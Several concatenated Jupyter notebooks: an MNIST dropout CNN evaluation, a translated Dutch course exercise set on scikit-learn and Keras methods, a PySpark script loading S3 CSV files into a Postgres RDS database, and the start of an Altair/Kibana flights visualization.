    true_labels = local_labels[sel_class.not_equal(local_labels)]
    predicted = sel_class[sel_class.not_equal(local_labels)]
    for t, p in zip(true_labels, predicted):
        errors[model_num][t.item()][p.item()] += 1
    # tally the correct predictions (the diagonal counts, used later as true positives)
    true_labels = local_labels[sel_class.eq(local_labels)]
    predicted = sel_class[sel_class.eq(local_labels)]
    for t, p in zip(true_labels, predicted):
        errors[model_num][t.item()][p.item()] += 1
    # keep a handful of incorrectly classified samples for plotting
    if len(incorrect_samples[model_num]) < 10:
        samples = local_batch[sel_class.not_equal(local_labels)]
        predicted = sel_class[sel_class.not_equal(local_labels)]
        true_labels = local_labels[sel_class.not_equal(local_labels)]
        for s, p, t in zip(samples, predicted, true_labels):
            incorrect_samples[model_num].append((s.cpu().numpy(), p.cpu().numpy(), t.cpu().numpy()))
    # and a handful of correctly classified samples
    if len(correct_samples[model_num]) < 10:
        samples = local_batch[sel_class.eq(local_labels)]
        predicted = sel_class[sel_class.eq(local_labels)]
        true_labels = local_labels[sel_class.eq(local_labels)]
        for s, p, t in zip(samples, predicted, true_labels):
            correct_samples[model_num].append((s.cpu().numpy(), p.cpu().numpy(), t.cpu().numpy()))
for model_num, cnn_model in enumerate(cnn_models):
with torch.set_grad_enabled(False):
cnn_model.eval()
for local_batch, local_labels in test_gen:
local_batch = local_batch.float()
local_labels = local_labels.float()
local_batch, local_labels = Variable(local_batch), Variable(local_labels)
local_batch = local_batch.to(device)
local_labels = local_labels.to(device)
out1 = cnn_model(local_batch)
ploss = loss(out1, local_labels.long())
sel_class = torch.argmax(out1, dim=1)
calculate_class_wise_errors(local_labels, sel_class, local_batch, model_num)
total_accurate[model_num] += sel_class.eq(local_labels).sum().item()
total_values[model_num] += local_labels.size(0)
print("Predicted " + str(total_accurate) +" correctly out of " + str(total_values) + "for respective drops: " + str([0.25,0.5,0.75]))
###Output
Predicted [9918, 9844, 6052] correctly out of [10000, 10000, 10000]for respective drops: [0.25, 0.5, 0.75]
###Markdown
As can be seen from the test accuracies, dropout = 0.25 makes the best assumptions about the images without under- or overfitting; its accuracy is ever so slightly higher than that of the baseline model. For dropout = 0.5, the model still performs well, but the accuracy is ever so slightly below the baseline; we can say that it **slightly underfits**. For dropout = 0.75, the model performs the worst and **greatly underfits** the test data.

Below we plot a heatmap where the y-axis represents the actual label and the x-axis represents the predicted label. Please note that all diagonal elements have been set to zero, so the heatmap only shows the counts of incorrectly classified labels. For example, row = 4, col = 3 holds the count of images that were 4 but were classified as 3, and cell (4,4) is left empty, although ideally it would contain the count of all correctly classified images of 4. This heatmap is generated only to see whether any pair of digits is frequently confused in classification, or whether our model is biased toward any label. We plot the heatmap for all three models.
###Code
import seaborn as sns
class_acc = np.zeros((3,10,10))
for d in range(3):
for i in range(10):
for j in range(10):
if i!=j:
class_acc[d,i,j] = errors[d][i][j]
else:
class_acc[d,i,j] = 0
print("Dropout rate of " + str((d+1) * 0.25))
sns.heatmap(class_acc[d])
plt.show()
###Output
Dropout rate of 0.25
###Markdown
**Plotting a few images incorrectly classified by our model. We see that these images are ambiguous, a little hard to interpret, or blurry. Each image shows its true value - predicted value pair on top of it.**
###Code
print("Incorrectly classified samples. (True and predicted values)")
for d in range(3):
print("\n\nDropout rate:" + str(d*0.25 + 0.25))
fig, ax = plt.subplots(nrows=2, ncols=5, sharex=True, sharey=True)
ax = ax.flatten()
for i in range(10):
img=np.array(incorrect_samples[d][i][0]).reshape(28,28)
ax[i].imshow(img, cmap="Greys")
ax[i].title.set_text(str(int(incorrect_samples[d][i][2])) + "-" + str(incorrect_samples[d][i][1]))
ax[0].set_yticks([])
ax[0].set_xticks([])
plt.tight_layout()
plt.show()
###Output
Incorrectly classified samples. (True and predicted values)
Dropout rate:0.25
###Markdown
**Plotting a few images correctly classified by our model.**
###Code
print("Correctly classified samples. (true and predicted values)")
for d in range(3):
print("\n\nDropout rate:" + str(d*0.25 + 0.25))
fig, ax = plt.subplots(nrows=2, ncols=5, sharex=True, sharey=True)
ax = ax.flatten()
for i in range(10):
img=np.array(correct_samples[d][i][0]).reshape(28,28)
ax[i].imshow(img, cmap="Greys")
ax[i].title.set_text(str(int(correct_samples[d][i][2])) + "-" + str(correct_samples[d][i][1]))
ax[0].set_yticks([])
ax[0].set_xticks([])
plt.tight_layout()
plt.show()
###Output
Correctly classified samples. (true and predicted values)
Dropout rate:0.25
###Markdown
**Below we plot a confusion matrix for each class. For each class: all correct predictions for that class count as true positives; all images of that class that were incorrectly classified count as false negatives; all images not of that class but classified as that class count as false positives; and all images that were not of the class and were also classified as not belonging to it count as true negatives.**

**We plot the confusion matrix for all three cases.**
###Code
import pandas as pd
# Confusion matrix
confusion_arr = np.zeros((3, 10, 4))
confusion_dfs = []
for d in range(3):
for i in range(10):
confusion_arr[d][i][0] = errors[d][i][i] # tp
for j in range(10):
if i!=j:
confusion_arr[d][i][1]+=errors[d][j][i] # fp
for j in range(10):
if i!=j:
confusion_arr[d][i][2]+= errors[d][i][j] # fn
confusion_arr[d][i][3] = total_values[d] - sum(confusion_arr[d][i][:3]) # tn
confusion_dfs.append(pd.DataFrame(confusion_arr[d], columns=["tp", "fp", "fn", "tn"]))
confusion_dfs[d]["precision"] = confusion_dfs[d]["tp"] / (confusion_dfs[d]["tp"] + confusion_dfs[d]["fp"])
confusion_dfs[d]["recall"] = confusion_dfs[d]["tp"] / (confusion_dfs[d]["tp"] + confusion_dfs[d]["fn"])
confusion_dfs[d]["accuracy"] = (confusion_dfs[d]["tp"] + confusion_dfs[d]["tn"]) / 10000
print("Overall Accuracy:" + str(total_accurate[0]/total_values[0]) + " For dropout:" + str(0.25))
confusion_dfs[0]
print("Overall Accuracy:" + str(total_accurate[1]/total_values[1]) + " For dropout:" + str(0.5))
confusion_dfs[1]
print("Overall Accuracy:" + str(total_accurate[2]/total_values[2]) + " For dropout:" + str(0.75))
confusion_dfs[2]
###Output
Overall Accuracy:0.6052 For dropout:0.75
|
Opdrachten_4.ipynb | ###Markdown
Exercises for the Introduction to Python for Data Science -- part 4: "Machine Learning"

The exercises in this notebook belong to the fourth part of the course, in which we use Python for machine learning. Most of these exercises already come up during the course evening. I recommend doing all the exercises you don't get to during the course at home. In some cases they contain lesson material that does not come up anywhere else in the course content.

All exercises have an example solution that is loaded when the cells with "%load XXX" are executed. Note:
- Try it yourself first! You only really learn by trying, possibly failing, and trying again!
- This is *one* solution; multiple variants are probably possible. If in doubt, feel free to discuss with a fellow student or with the instructor!

Elective exercises! Each exercise number comes with two choices, a and b. During the course there is only time for one of these, so by all means pick the one that appeals to you most! At home you can always go through the rest at your leisure.

1. Supervised machine learning

Supervised machine learning covers a whole range of techniques. The instruction already looked at logistic regression, a method for classification. There are more methods for this. In exercise 1a we look at decision trees. The dataset on the passengers of the Titanic is a well-known candidate for this example. Along the way we also get to know some "data preparation" tools.

Exercise 1b is about linear regression and nearest-neighbor regression. These are methods to "learn" continuous target variables (for example: estimate body weight when you know body height). For this we use an artificial dataset that we create with numpy functionality.

1a. Who survived the Titanic disaster?

The data directory contains a csv with data about the Titanic: titanic3.csv. Read it with pandas and have a look at what is in it. It contains a number of columns that we will ignore from now on. Make an array called labels from the survived column, and keep as features a DataFrame with the following columns from the dataset:
- pclass: class of the passenger.
- sex: sex.
- age: age.
- sibsp: number of siblings and spouses on board.
- parch: number of parents or children on board.
- fare: the amount paid.
- embarked: port of embarkation (C = Cherbourg; Q = Queenstown; S = Southampton).

pclass, sex and embarked are categorical variables. Use the pandas function get_dummies() to turn these columns into dummy variables. What happens to them as a result? Afterwards, turn the DataFrame into an array that will become the features for the training algorithm.

It also turns out there is missing data. Here we can "impute" other data. Use sklearn.preprocessing.Imputer() for that (default parameters are OK) and then fit an instance of sklearn.tree.DecisionTreeClassifier (also with default parameters). How good is the prediction?
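Before loading the solution below, here is a minimal sketch of the main ingredients (one possible approach, not the official solution; it assumes the csv lives at data/titanic3.csv and a modern scikit-learn, where the old Imputer has been replaced by sklearn.impute.SimpleImputer):
###Code
import pandas as pd
from sklearn.impute import SimpleImputer
from sklearn.tree import DecisionTreeClassifier

titanic = pd.read_csv('data/titanic3.csv')
labels = titanic['survived'].values
features = titanic[['pclass', 'sex', 'age', 'sibsp', 'parch', 'fare', 'embarked']]

# one-hot encode the categorical columns
features = pd.get_dummies(features, columns=['pclass', 'sex', 'embarked'])

# fill in the missing values (mean imputation) and fit a decision tree
X = SimpleImputer().fit_transform(features.values)
tree = DecisionTreeClassifier().fit(X, labels)
print('training accuracy:', tree.score(X, labels))
###Output
_____no_output_____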
###Code
to_include = os.path.join('uitwerkingen', '4-decisiontree.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
This decision tree has an exceptionally large number of branches. If you did it correctly, it looks as follows: unreadable, but you can open the image elsewhere to see what it says.

Use the attribute feature_importances_ (note the trailing underscore) to see which features are important. Why is this not unambiguous to interpret for this decision tree?

Then use the options of the DecisionTreeClassifier to make a much simpler tree. Try to reproduce the list of important features of the tree below by playing with the hyperparameters of the decision tree.

Unfortunately, one of the big shortcomings of Python in machine learning at the moment is still the visualization of decision trees. This is currently very dependent on the operating system of your computer, so we will not go into it here.
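A minimal sketch of taming the tree with hyperparameters (reusing X, labels and features from the sketch above; the exact values that reproduce the target list of important features are for you to find):
###Code
from sklearn.tree import DecisionTreeClassifier

simple_tree = DecisionTreeClassifier(max_depth=3).fit(X, labels)

# pair each feature name with its importance; zeros mean the feature is unused
for name, importance in zip(features.columns, simple_tree.feature_importances_):
    print(f'{name}: {importance:.3f}')
###Output
_____no_output_____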
###Code
to_include = os.path.join('uitwerkingen', '4-simpletree.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
1b. Learning from your neighbors

We are going to look at a regression problem where a linear regression would do quite well, but where the data contains extra characteristics that a linear regression does not pick up. First we create and visualize the dataset:
###Code
x = np.linspace(-3, 3, 100) # a hundred points between x=-3 and x=3
rng = np.random.RandomState(42) # initialize a random generator
scatter = rng.uniform(low=-1., high=1., size=len(x)) # scatter is uniformly distributed between -1 and 1
y = np.sin(4 * x) + x + scatter # the y variable is a linear function, plus a sine, plus scatter
plt.plot(x, y, 'o'); # this is what it looks like!
###Output
_____no_output_____
###Markdown
I demonstrate the linear regression here, so that you have seen it once. I also visualize and evaluate the result:
###Code
from sklearn.linear_model import LinearRegression
regressor = LinearRegression() # hyperparameters are optional in this step
X = x[:, np.newaxis] # numpy trick to get the shape suitable for sklearn
print("Shape of x:", np.shape(x))
print("Shape of X:", np.shape(X))
regressor.fit(X, y) # fit the model
print('Fit coefficients: ', regressor.coef_) # coefficients are multiplied by the independent variable
print('y-axis intercept: ', regressor.intercept_) # the intercept is fitted separately in this model
plt.plot(x, y, 'o')
plt.plot(x, regressor.intercept_+regressor.coef_*x, 'k:')
plt.title("Data with linear regression");
###Output
Shape of x: (100,)
Shape of X: (100, 1)
Fit coefficients:  [0.93003279]
y-axis intercept:  -0.059638513243581374
###Markdown
The package sklearn.neighbors contains a regressor that uses the k-Nearest Neighbors method. Look up what that means. Can you predict what a low k and a high k will lead to?

Use this regressor to train a model and then create a very finely spaced series of points along the x-axis (in a way comparable to how the data was generated, for example) to see what that does to the resulting "fit". Make a plot with the data points and the regression for different values of k.
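A minimal sketch of the idea (low k follows the noise, high k smooths it away; treat the chosen k values as examples):
###Code
from sklearn.neighbors import KNeighborsRegressor

x_fine = np.linspace(-3, 3, 1000)[:, np.newaxis]  # finely spaced points along the x-axis
plt.plot(x, y, 'o', alpha=0.3)
for k in [1, 5, 50]:
    knn = KNeighborsRegressor(n_neighbors=k).fit(X, y)
    plt.plot(x_fine, knn.predict(x_fine), label=f'k={k}')
plt.legend();
###Output
_____no_output_____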
###Code
to_include = os.path.join('uitwerkingen', '4-nearestneighbor.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
2. Unsupervised machine learning

In the instruction we looked at k-means clustering. Within the class of clustering algorithms, in exercise 2a we also look at non-spherical clusters with k-means and how you can avoid problems with those through "density-based" and "hierarchical" clustering methods.

Exercise 2b is about the other class of unsupervised learning: dimensionality reduction and pattern recognition. For this we use Principal Component Analysis, IsoMap and t-SNE. The datasets will be generated and visualized for you. You get to work with the algorithms yourself!

2a. Clustering continued

We have already seen KMeans in action on blobs. Now we transform the blobs into elongated shapes:
###Code
from sklearn.datasets import make_blobs
X, y = make_blobs(random_state=170, n_samples=600)
plt.scatter(X[:, 0], X[:, 1], s=20, label="Oorspronkelijke blobs")
rng = np.random.RandomState(74)
transformation = rng.normal(size=(2, 2))
X = np.dot( X, transformation) # Het is niet heel belangrijk dat je snapt wat hier gebeurt.
plt.scatter(X[:, 0], X[:, 1], s=20, label="Na transformatie")
plt.legend(loc='lower right');
###Output
_____no_output_____
###Markdown
You can also let k-means loose on these new blobs. Do so, with 3 clusters (or experiment a bit), and draw your conclusions!

Afterwards, compare the algorithms DBSCAN (density based) and AgglomerativeClustering (hierarchical clustering) on both these blobs and the blobs from the instruction notebook (X1 and X2).
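A minimal sketch comparing the three algorithms on the transformed blobs (note that DBSCAN's eps will need some tuning for this data):
###Code
from sklearn.cluster import KMeans, DBSCAN, AgglomerativeClustering

fig, axes = plt.subplots(1, 3, figsize=(12, 3))
models = [('KMeans', KMeans(n_clusters=3)),
          ('DBSCAN', DBSCAN(eps=0.5)),
          ('Agglomerative', AgglomerativeClustering(n_clusters=3))]
for ax, (name, model) in zip(axes, models):
    clusters = model.fit_predict(X)
    ax.scatter(X[:, 0], X[:, 1], c=clusters, s=10)
    ax.set_title(name)
###Output
_____no_output_____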
###Code
to_include = os.path.join('uitwerkingen', '4-clustering.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
2b. PCA and manifold learners

Reducing the number of dimensions of your dataset is often a good idea. Not only does it help with visualization, but many algorithms are also more reliable in fewer dimensions. This is especially true if your data contains correlated quantities, which effectively means that if you know one of them, you already have a good idea of the other. In principle you can then get by with only one of these variables.

Principal Component Analysis is a technique to deal with this. Consider the following dataset:
###Code
rnd = np.random.RandomState(5)
X_ = rnd.normal(size=(300, 2))
X_blob = np.dot(X_, rnd.normal(size=(2, 2))) + rnd.normal(size=2)
y = X_[:, 0] > 0
plt.scatter(X_blob[:, 0], X_blob[:, 1], c=y, linewidths=0, s=30)
plt.title("De kleur is een te voorspellen label")
plt.xlabel("feature 1")
plt.ylabel("feature 2");
###Output
_____no_output_____
###Markdown
It should be clear that a linear relation exists between the two features, which is of no further use to you. You can recover it with a linear regression and subtract it, as below:
###Code
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
print("Shape:", np.shape(X_blob))
regressor.fit(X_blob[:,0].reshape(len(X_blob),1), X_blob[:,1]) # Fit the model
print('Weight coefficients: ', regressor.coef_) # coefficients are multiplied by the independent variable
print('y-axis intercept: ', regressor.intercept_) # the intercept is fitted as an extra term in this model
plt.scatter(X_blob[:,0], X_blob[:,1] - regressor.intercept_ - regressor.coef_*X_blob[:,0], c=y, linewidths=0, s=30)
plt.axvline(0, linestyle='dotted')
plt.axhline(0, linestyle='dotted');
###Output
Shape: (300, 2)
Weight coefficients: [-0.85152914]
y-axis intercept: -2.7908371815513364
###Markdown
You can already see that the fit was not very good: the origin does not lie in the middle of your data cloud either. Moreover, you had to know that this relation existed in order to do this. Principal Component Analysis finds such relations by itself, even between just a few features in a much larger set of features.

Use Principal Component Analysis (from sklearn.decomposition) and plot the two components against each other (the number of components is equal to the number of features in your dataset).
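A minimal sketch (PCA centers the data itself, so the cloud ends up around the origin):
###Code
from sklearn.decomposition import PCA

pca = PCA(n_components=2)
X_pca = pca.fit_transform(X_blob)
plt.scatter(X_pca[:, 0], X_pca[:, 1], c=y, linewidths=0, s=30)
plt.xlabel('first component')
plt.ylabel('second component');
###Output
_____no_output_____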
###Code
to_include = os.path.join('uitwerkingen', '4-pca.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
PCA is powerful and fast, but it only finds linear relations between data and linear structures. If you are unlucky, your data is more complicated. In the example below, all data points lie along an S-curve. If the color is what needs to be predicted, then only the location "along" the S matters.

First use PCA to see what result that gives and whether it helps you. After that you can also use IsoMap and t-SNE (both from sklearn.manifold). It goes too far for now to discuss how those algorithms work, but both look for consistent structures of arbitrary shape in a multi-dimensional space and return a simplified variant in which the "useful structure" is preserved in fewer dimensions. (A sketch of this comparison follows the data-generation cell below.)

If you have time and feel like it, you can investigate how long both algorithms take. In the bonus exercises of the homework we take this comparison a bit further.
###Code
from sklearn.datasets import samples_generator
from mpl_toolkits.mplot3d import Axes3D
n_points = 1000
X, color = samples_generator.make_s_curve(n_points, random_state=0)
fig = plt.figure(figsize=(15, 8))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=color, cmap=plt.cm.Spectral, s=40)
ax.view_init(10, -72)
to_include = os.path.join('uitwerkingen', '4-Scurve.py')
# %load $to_include
###Output
_____no_output_____
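###Markdown
A minimal sketch of the comparison on the S-curve data generated above (t-SNE is noticeably slower than the other two):
###Code
from sklearn.decomposition import PCA
from sklearn.manifold import Isomap, TSNE

fig, axes = plt.subplots(1, 3, figsize=(12, 3))
models = [('PCA', PCA(n_components=2)),
          ('Isomap', Isomap(n_components=2)),
          ('t-SNE', TSNE(n_components=2))]
for ax, (name, model) in zip(axes, models):
    X_2d = model.fit_transform(X)
    ax.scatter(X_2d[:, 0], X_2d[:, 1], c=color, cmap=plt.cm.Spectral, s=10)
    ax.set_title(name)
###Output
_____no_output_____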
###Markdown
3. Neural networks

For the part about neural networks we will continue with the MNIST hand-written digits. Again there are two elective exercises. In 3a we look at the use of bottleneck layers for dimensionality reduction. An application of auto-encoders as de-noisers (removing noise from images) is the subject of 3b.

3a. Dimensionality reduction with neural networks

An auto-encoder reproduces the input layer, but it is insightful (and potentially very useful!) to also let a network with a bottleneck predict the labels. Below we try that for a bottleneck with only two neurons.

The data is loaded for you first; after that it is up to you to train a network with a bottleneck (of two neurons). Make sure your neural network gets larger layers again after the bottleneck.

Afterwards, also use the "summary" method to check whether your network looks the way you expect.
###Code
from sklearn.datasets import fetch_mldata
from sklearn.model_selection import train_test_split
# note: in recent scikit-learn versions fetch_mldata has been replaced by fetch_openml
mnist = fetch_mldata("MNIST original", data_home='./data/')
features, labels = mnist.data / 255., mnist.target
# splitting into a training and test set happens here -- check the documentation!
xtr, x, ytr, y = train_test_split(features, labels, test_size=0.3)
print("Dimensions of xtr:", xtr.shape)
print("Dimensions of ytr:", ytr.shape)
print("Dimensions of x:", x.shape)
print("Dimensions of y:", y.shape)
to_include = os.path.join('uitwerkingen', '4-nn_dimensiereductie.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
I want to emphasize here that 95% of the labels are predicted correctly (in the example in the solution), even though there is a bottleneck layer with only two neurons in the network! That layer has only 2 output values, after which the network that builds back up can predict the labels almost perfectly. *All the information needed to predict the labels is thus contained in those 2 numbers!* Think about what that could be used for. By encoding the images with the first half of the network (up to and including the bottleneck) you can reduce the images to two numbers. By applying the second part of the network, the decoder, to these two numbers you can reproduce the labels quite well.

Since the bottleneck layer is two-dimensional, you can also visualize it nicely. It should be evident there that there are ten different labels. We use the keras backend, which can define a function that maps the values of different layers in your network onto each other (effectively you build the encoder here). Define such a function using tensorflow.keras.backend.function(). See the documentation for how this works.

Plot all points in this two-dimensional plane, give them a color corresponding to the true label, and think carefully about what you see!
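A minimal sketch of such an encoder function (assuming `model` is your trained network from the solution and that the two-neuron bottleneck is the layer at index 2; adjust the index to your own architecture):
###Code
from tensorflow.keras import backend as K

# map the network input to the activations of the two-neuron bottleneck layer
encode = K.function([model.input], [model.layers[2].output])
codes = encode([x])[0]

plt.scatter(codes[:, 0], codes[:, 1], c=y, cmap='tab10', s=3)
plt.colorbar();
###Output
_____no_output_____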
###Code
to_include = os.path.join('uitwerkingen', '4-nn_dimensiereductieresultaat.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
**If you have time and feel like it:** Since this works so well, would it also work to reconstruct the images with an auto-encoder whose bottleneck layer has only two neurons? Give it a try!
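One possible starting point (a small fully-connected auto-encoder with a two-neuron bottleneck; the architecture and training settings are just examples):
###Code
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense

auto = Sequential([
    Dense(128, activation='relu', input_shape=(784,)),
    Dense(2, activation='relu'),       # the two-neuron bottleneck
    Dense(128, activation='relu'),
    Dense(784, activation='sigmoid'),
])
auto.compile(optimizer='adam', loss='binary_crossentropy')
auto.fit(xtr, xtr, epochs=10, batch_size=256)
###Output
_____no_output_____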
###Code
to_include = os.path.join('uitwerkingen', '4-nn_kleineencoder.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
3b. A denoising auto-encoder

Use the auto-encoder as it appeared in the instruction. Train it on "clean" images of the MNIST digits. Before you run your test set through it to see how the images are reconstructed, add noise to them: each pixel value is increased by a small random number. Come up with a method for that yourself. Occasionally this value may be quite high, but not too often. Visualize the images to convince yourself that what you are using is a handwritten digit with a bit of noise, and not squares filled with mostly noise.

Now try to reconstruct these. If you have time left you can also experiment with training on noisy data and see what that does. What can also be interesting is to train both an auto-encoder and a classifier (predictor of the labels) on the training set without noise, and then predict the label of noisy images, both with and without de-noising. The second part of the solution does that.
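One possible way to add such noise (exponential noise is usually small but occasionally large; the scale is just an example):
###Code
noise = np.random.exponential(scale=0.1, size=x.shape)
x_noisy = np.clip(x + noise, 0., 1.)  # keep the pixel values in the valid range

plt.imshow(x_noisy[0].reshape(28, 28), cmap='gray');
###Output
_____no_output_____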
###Code
to_include = os.path.join('uitwerkingen', '4-autoencoder.py')
# %load $to_include
to_include = os.path.join('uitwerkingen', '4-ruisvoorspelling.py')
# %load $to_include
###Output
_____no_output_____ |
Data_load_to_RDS.ipynb | ###Markdown
###Code
import os
# Find the latest version of spark 3.0 from http://www-us.apache.org/dist/spark/ and enter as the spark version
# For example:
spark_version = 'spark-3.1.1'
#spark_version = 'spark-3.<enter version>'
os.environ['SPARK_VERSION']=spark_version
# Install Spark and Java
!apt-get update
!apt-get install openjdk-11-jdk-headless -qq > /dev/null
!wget -q http://www-us.apache.org/dist/spark/$SPARK_VERSION/$SPARK_VERSION-bin-hadoop2.7.tgz
!tar xf $SPARK_VERSION-bin-hadoop2.7.tgz
!pip install -q findspark
# Set Environment Variables
os.environ["JAVA_HOME"] = "/usr/lib/jvm/java-11-openjdk-amd64"
os.environ["SPARK_HOME"] = f"/content/{spark_version}-bin-hadoop2.7"
# Start a SparkSession
import findspark
findspark.init()
!wget https://jdbc.postgresql.org/download/postgresql-42.2.9.jar
from pyspark.sql import SparkSession
spark = SparkSession.builder.appName("CloudETL").config("spark.driver.extraClassPath","/content/postgresql-42.2.9.jar").getOrCreate()
# Read in data from S3 Buckets
from pyspark import SparkFiles
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/hosp_addr.csv"
spark.sparkContext.addFile(url)
hosp_addr_df = spark.read.csv(SparkFiles.get("hosp_addr.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
hosp_addr_df.show()
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/hosp_closures.csv"
spark.sparkContext.addFile(url)
hosp_closures_df = spark.read.csv(SparkFiles.get("hosp_closures.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
hosp_closures_df.show()
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/hosp_metric.csv"
spark.sparkContext.addFile(url)
hosp_metric_df = spark.read.csv(SparkFiles.get("hosp_metric.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
hosp_metric_df.show()
hosp_metric_df.dtypes
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/hospital_popup.csv"
spark.sparkContext.addFile(url)
hospital_popup_df = spark.read.csv(SparkFiles.get("hospital_popup.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
hospital_popup_df.show()
# Loading the svi data
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/svi_data.csv"
spark.sparkContext.addFile(url)
svi_data_df = spark.read.csv(SparkFiles.get("svi_data.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
svi_data_df.show()
url="https://yellowteambucket.s3.us-east-2.amazonaws.com/us_hospital_locations.csv"
spark.sparkContext.addFile(url)
raw_hospital_data = spark.read.csv(SparkFiles.get("us_hospital_locations.csv"), sep=",", header=True, inferSchema=True)
# Show DataFrame
raw_hospital_data.show()
# Configure settings for RDS
mode = "append"
jdbc_url="jdbc:postgresql://capstone.cjj05msruqqh.us-east-2.rds.amazonaws.com:5432/capstone_db"
config = {"user":"postgres",
"password": "",
"driver":"org.postgresql.Driver"}
# Write DataFrame to hosp_addr_df table in RDS
hosp_addr_df.write.jdbc(url=jdbc_url, table='hosp_addr', mode=mode, properties=config)
# Write dataframe to hospital closures table in RDS
hosp_closures_df.write.jdbc(url=jdbc_url, table='hosp_closures', mode=mode, properties=config)
# Write dataframe to state metrics table in RDS
hosp_metric_df.write.jdbc(url=jdbc_url, table='state_metrics', mode=mode, properties=config)
# Write dataframe to svi_data table in RDS
svi_data_df.write.jdbc(url=jdbc_url, table='svi_data', mode=mode, properties=config)
# Write dataframe to hospital popup table in RDS
hospital_popup_df.write.jdbc(url=jdbc_url, table='hosp_popup', mode=mode, properties=config)
# Write dataframe to raw hospital data in RDS
raw_hospital_data.write.jdbc(url=jdbc_url, table='raw_hospital_data', mode=mode, properties=config)
###Output
_____no_output_____ |
create simulation data for binary classification.ipynb | ###Markdown
Creating Simulation Data for Binary Classification

Note: this can be very useful when you want to test your model or provide some sample practice for your students.

This content includes:
- How binary classification (logistic regression) works
- How to generate simulation data
- Testing the simulation data with sklearn logistic regression

1. How binary classification (logistic regression) works

Brief workflow: input (x1, x2, ...) ==> logit function (z) ==> sigmoid function (P) ==> casting (y) ==> output (1 or 0)

The logit produces an output (z) that is linear in the inputs. A simple example of a logit is the same as a multivariable linear regression model. Example) $z = \beta _0 + \beta_1\cdot x_1 + ... + \beta_n \cdot x_n$ This output theoretically has a range of (-inf, inf).

In this example, I used only one input variable (x1). I generated beta0 (the intercept) and beta1 (the coefficient of x1) as random numbers drawn from a standard normal distribution.
###Code
import numpy as np
import matplotlib.pyplot as plt
np.random.seed(0)
x1 = np.random.randn(1000) * 7
beta0 = np.random.randn(1)
beta1 = np.random.randn(1)
print('beta0: {},\nbeta1: {}'.format(beta0, beta1))
z = beta0 + x1*beta1
plt.scatter(x1, z, s=1)
plt.xlabel('x1')
plt.ylabel('z')
plt.grid()
plt.show()
###Output
beta0: [0.55596268],
beta1: [0.89247389]
###Markdown
The sigmoid transforms the output of the logit into (0, 1).

Sigmoid: $P(y=1) = \frac{1}{1+e^{-z}}$

P is the probability of being positive (1) in the binary classification.
###Code
p = 1 / (1 + np.exp(-z))
plt.scatter(x1, p, s=1)
plt.axhline(0.5, color='black', linestyle='--', alpha=.3)
plt.axhline(0, color='black', linestyle='--', alpha=.3)
plt.axhline(1, color='black', linestyle='--', alpha=.3)
plt.axvline(-beta0/beta1, color='black', linestyle='--', alpha=0.3)
plt.xlabel('x1')
plt.ylabel('P')
plt.show()
###Output
_____no_output_____
###Markdown
If P is greater than or equal to 0.5 (p >= 0.5), the y prediction will be 1. If P is less than 0.5 (p < 0.5), the y prediction will be 0. In this example, 51.2% of the samples are predicted as 1.
###Code
y_prediction = np.zeros(1000)
y_prediction[p>=0.5] = 1
y_prediction = np.array(y_prediction, dtype=int)
y_prediction.sum()/len(y_prediction)
pie = np.bincount(y_prediction)
plt.pie(pie, labels=np.arange(2), autopct='%1.1f%%')
plt.show()
###Output
_____no_output_____
###Markdown
2. How to generate simulation data

There are two common methods to generate the y values for a simulation:
- Create the simulated y with the same method we use to predict y (the wrong way): if $p >= 0.5$, put 1, else put 0.
- Generate a uniform random number (r) between 0 and 1 and compare it to p (the right way): if $r <= p$, put 1, else put 0.
###Code
from sklearn.linear_model import LogisticRegression
x1 = x1.reshape(-1,1)
y_wrong_way = np.zeros(1000)
y_wrong_way[p>=0.5] = 1
model = LogisticRegression()
model.fit(x1, y_wrong_way)
y_hat = model.predict(x1)
model.intercept_, model.coef_
beta0, beta1
from sklearn.metrics import accuracy_score, classification_report, confusion_matrix
accuracy_score(y_hat, y_wrong_way)
confusion_matrix(y_hat, y_wrong_way)
###Output
_____no_output_____
###Markdown
With the y simulated the wrong way (first method), the accuracy of the logistic regression model is 99.9%. However, the model predicted the wrong intercept and coefficient:

Predicted intercept & coefficient: (2.40545658, 4.20435562)
Generated intercept & coefficient: (0.55596268, 0.89247389)

This means the model is overfitted.

In the second method, P is the probability of being 1. This is the same as the probability that a uniformly distributed random number in [0, 1) falls between 0 and P.
###Code
r = np.random.rand(1000)
y_right_way = np.zeros(1000)
y_right_way[r<=p] = 1
y_right_way.sum()/len(y_right_way)
model2 = LogisticRegression()
model2.fit(x1, y_right_way)
y_hat2 = model2.predict(x1)
model2.intercept_, model2.coef_
accuracy_score(y_hat2, y_right_way)
###Output
_____no_output_____ |
viz-1b-flights-splom.ipynb | ###Markdown
viz-1b-flights-splom.ipynbThis notebook builds on the learnings from [the first one](ttps://walterra.github.io/jupyter2kibana/viz-1a-flights-histogram.html) and uses the same data to create and deploy a scatterplot matrix. The difference here is that we moved the code to create the SavedObject in Kibana to a helper function into [kibana_vega_util.py](https://github.com/walterra/jupyter2kibana/blob/master/kibana_vega_util.py) so we can reuse it.
###Code
import datetime
import altair as alt
import eland as ed
import json
import numpy as np
import matplotlib.pyplot as plt
alt.data_transformers.disable_max_rows()
url = 'http://localhost:9200/kibana_sample_data_flights/_search?size=1000'
url_data = alt.Data(url=url, format=alt.DataFormat(property='hits.hits',type='json'))
fields = [
'Carrier',
'AvgTicketPrice',
'DistanceKilometers',
'DistanceMiles',
'FlightDelayMin',
'FlightTimeMin',
'dayOfWeek'
]
rename_dict = dict((a, 'datum._source.'+a) for a in fields)
